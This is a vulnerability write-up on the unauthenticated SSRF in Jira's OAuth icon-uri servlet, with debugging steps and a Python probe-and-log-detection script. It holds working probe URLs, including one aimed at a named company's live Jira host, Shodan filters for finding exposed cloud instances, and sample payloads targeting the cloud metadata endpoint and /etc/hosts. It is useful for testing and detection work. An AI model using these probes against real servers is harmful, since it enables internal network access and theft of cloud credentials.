Affected versions:
Jira < 7.3.5
Jira installation reference: https://blog.csdn.net/caiqiiqi/article/details/89017806
Install Jira 6.4.14:
https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-6.4.14.tar.gz
Vulnerable component: Atlassian OAuth plugin (the IconUriServlet of the OAuth service provider plugin)
Test method: without logging in, request
https://%basepath%/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl
The servlet fetches whatever consumerUri points at from the Jira server and returns the result to the caller, so an unauthenticated client can make the Jira host reach URLs of its choosing (SSRF). A safe check is to point consumerUri at a host you control and confirm the request arrives there.
Reference: http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
Debugging
According to the article, the vulnerable code is IconUriServlet.
Search the jar files for the string (class names are stored uncompressed in the jar's zip directory, so a plain grep finds the jar that contains the class):
grep -irn "iconuri" `find .|grep .jar`
This locates ./atlassian-jira/WEB-INF/atlassian-bundled-plugins/atlassian-oauth-service-provider-plugin-1.9.8.jar.
Set a breakpoint in the doGet() method of
atlassian-jira-6.4.14-standalone/atlassian-jira/WEB-INF/atlassian-bundled-plugins/atlassian-oauth-service-provider-plugin-1.9.8.jar!/com/atlassian/oauth/serviceprovider/internal/servlet/user/IconUriServlet.class
Update, September 7:
References:
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739
https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a
https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326
Jira fingerprint and search filters (Shodan query syntax; X-AUSERNAME is a response header Jira adds to every reply, and the value anonymous means the request was served without a session):
X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com"      -- for AWS
X-AUSERNAME: anonymous org:"Microsoft Azure" -- for Azure
X-AUSERNAME: anonymous org:"google"          -- for Google
Some SSRF examples:
https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com
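As an added example (not code from the original post or from Atlassian), the following Python script builds the unauthenticated probe described in the test method above, triages the reply, and runs a detection pass over access-log lines for the kind of icon-uri requests shown in the SSRF examples. Assumptions: the tester controls the consumerUri target host and serves a known marker string from it; the access log is in Tomcat common log format; the hostnames jira.example.com and confluence.internal.example and the sample log lines are constructed for the example.

```python
"""Added example (not from the original post): probe construction, response
triage and access-log detection for the Jira OAuth IconUriServlet SSRF.
Assumptions: the tester controls the consumerUri target and serves a known
marker string from it; log lines are in Tomcat common log format."""
import re
from urllib.parse import parse_qs, urlencode, urljoin, urlparse

ICON_URI_PATH = "/plugins/servlet/oauth/users/icon-uri"

# Common log format: ip ident user [timestamp] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def build_probe_url(base_url, target):
    """Unauthenticated probe: <base>/plugins/servlet/oauth/users/icon-uri?consumerUri=<target>.
    base_url may carry a context path such as https://host/jira."""
    base = base_url if base_url.endswith("/") else base_url + "/"
    return urljoin(base, ICON_URI_PATH.lstrip("/")) + "?" + urlencode({"consumerUri": target})


def is_jira_response(headers):
    """Jira stamps every reply with X-AUSERNAME; the value 'anonymous' means no session was used."""
    return any(k.lower() == "x-ausername" for k in headers)


def classify_response(status, headers, body, marker):
    """Triage a probe reply. `marker` is content served only by the tester's own target host
    (assumption), so finding it in Jira's reply proves Jira fetched the target server-side."""
    if status == 200 and marker in body:
        return "proxied"
    return "not-proxied"


def probe(base_url, target, marker, timeout=10):
    """Send the probe with no credentials and triage it (network call; the offline
    sample below does not exercise this)."""
    import urllib.error
    import urllib.request
    url = build_probe_url(base_url, target)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            status, headers, body = resp.status, dict(resp.headers.items()), resp.read()
    except urllib.error.HTTPError as err:
        status, headers, body = err.code, dict(err.headers.items()), err.read()
    body = body.decode("utf-8", "replace")
    return is_jira_response(headers), classify_response(status, headers, body, marker)


def suspicious_icon_uri_requests(log_lines, allowed_hosts):
    """Return (ip, status, consumerUri) for icon-uri requests whose consumerUri host is not a
    known OAuth consumer. URIs without a parseable host (e.g. file:) are flagged as well."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        req = urlparse(m.group("path"))
        if not req.path.endswith(ICON_URI_PATH):  # tolerate a context path prefix
            continue
        for consumer in parse_qs(req.query).get("consumerUri", []):  # parse_qs decodes %XX
            host = urlparse(consumer).hostname
            if host is None or host not in allowed_hosts:
                hits.append((m.group("ip"), int(m.group("status")), consumer))
    return hits


# Constructed sample log lines for the example; not real traffic.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [07/Sep/2019:10:00:01 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl HTTP/1.1" 200 512',
    '10.0.0.5 - - [07/Sep/2019:10:00:02 +0000] "GET /jira/plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 1203',
    '10.0.0.9 - alice [07/Sep/2019:10:00:03 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://confluence.internal.example/ HTTP/1.1" 200 800',
    '10.0.0.7 - - [07/Sep/2019:10:00:04 +0000] "GET /browse/PROJ-1 HTTP/1.1" 200 2048',
    '10.0.0.5 - - [07/Sep/2019:10:00:05 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=file%3A%2F%2F%2Fetc%2Fhosts HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    print(build_probe_url("https://jira.example.com", "https://www.google.nl"))
    for hit in suspicious_icon_uri_requests(SAMPLE_ACCESS_LOG, {"confluence.internal.example"}):
        print("suspicious icon-uri request:", hit)
```

The allow-list for the detection pass should hold the hosts of OAuth consumers actually linked to the instance (application links); everything else hitting icon-uri without a session is worth an alert, and a 200 with a large byte count against a non-allow-listed host is the strongest signal.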
References
- https://jira.atlassian.com/browse/JRASERVER-65862
- https://jira.atlassian.com/browse/CONFSERVER-53362